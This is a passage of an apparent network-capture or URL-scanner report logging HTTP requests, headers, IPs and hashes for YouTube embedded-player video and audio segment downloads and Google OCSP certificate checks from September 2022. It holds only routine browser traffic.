H-Sc79IcABrLbOK&cver=1.20220918.00.00&sq=0&rn=1&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
91.90.45.172 200 OK 1.2 kB URL HTTP/1.1 rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&sq=0&rn=1&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 91.90.45.172:0
ASN #50304 Blix Solutions AS
File type ASCII text, with very long lines (1204), with no line terminators
Hash e9e169833c53c087a0e6544f9954da15
e4a3b6fb0b9d1c53168db385ce2469f378a69506
e0c93da41f8470a034b2d0bf1d6846da522bd0d71cc3fccffcb2237e48ca6f91
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&sq=0&rn=1&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-capm-vnae.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1204
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Restrict-Formats-Hint: None
X-Content-Type-Options: nosniff
Server: gvs 1.0
rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&range=0-11538&rn=2&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
91.90.45.172 200 OK 1.2 kB URL HTTP/1.1 rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&range=0-11538&rn=2&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 91.90.45.172:0
ASN #50304 Blix Solutions AS
File type ASCII text, with very long lines (1172), with no line terminators
Hash 68b53a661bc4431f128d0d7c3643b5ac
473a5c0bf03e67b7b7c84230bed3c50e6a19133f
46d7300629b3314def23d2073084e4f39ce204eb77a028f54f927c6fbc1edf65
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&range=0-11538&rn=2&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-capm-vnae.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1172
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: gvs 1.0
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash c81d42d817c63fd387f875fae88f126a
88fa4a4aa864600dfc025c7077d355d38d2d22b9
81ad3d8e554a0fd4530752e92a769bb4689229fb097bb09076bd85c7d3208fe7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 518633d1dac16539b3661b4a8f6c71df
30916f3e8d20afae54ebb7b8b775e4766861bf0e
cae6bd8337be7692912b529b12d2cabd6b7d5189199921fde4d60f5a836e4400
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 518633d1dac16539b3661b4a8f6c71df
30916f3e8d20afae54ebb7b8b775e4766861bf0e
cae6bd8337be7692912b529b12d2cabd6b7d5189199921fde4d60f5a836e4400
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgJL5b9ea0P7Qr62cOh-zphuqsi1a-93lZfm75ZB4V33UCIQC0tpzBkoh9GjX2ZdHKJOyTA-mrEtl7aBDZn3gg3tIOXA%3D%3D&range=0-11538&rn=4&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.110.134 200 OK 1.2 kB URL HTTP/1.1 rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgJL5b9ea0P7Qr62cOh-zphuqsi1a-93lZfm75ZB4V33UCIQC0tpzBkoh9GjX2ZdHKJOyTA-mrEtl7aBDZn3gg3tIOXA%3D%3D&range=0-11538&rn=4&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.110.134:0
File type ASCII text, with very long lines (1175), with no line terminators
Hash a632a88cec3df8a54677b406b5c071d6
749561c9e75eb74ac957b0c724deb1b095e86343
a102530a9f09a23055535a434e176b0c5859d12fd8c4dab5c57572324ea3d6ec
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgJL5b9ea0P7Qr62cOh-zphuqsi1a-93lZfm75ZB4V33UCIQC0tpzBkoh9GjX2ZdHKJOyTA-mrEtl7aBDZn3gg3tIOXA%3D%3D&range=0-11538&rn=4&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-5goeen7y.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1175
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: gvs 1.0
rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgSplxDuIJu5RCe9YYCgo2LVpc9EXFAl4XlXOMUYHeDR4CIBHHq4TFD9K86xo5hByCSHkpK_8ohqiR0RB_C86xBk8y&sq=0&rn=3&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.110.134 200 OK 1.2 kB URL HTTP/1.1 rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgSplxDuIJu5RCe9YYCgo2LVpc9EXFAl4XlXOMUYHeDR4CIBHHq4TFD9K86xo5hByCSHkpK_8ohqiR0RB_C86xBk8y&sq=0&rn=3&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.110.134:0
File type ASCII text, with very long lines (1223), with no line terminators
Hash 51cc13f3d71bfea0cd673782bcc012b9
18d8e3afaf53da56d44b7f3d490edae5d2e8c148
55e1bb6093ed15ce3a136ebbf4bd3fbe618db941d440751de6fbbbb99788605c
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgSplxDuIJu5RCe9YYCgo2LVpc9EXFAl4XlXO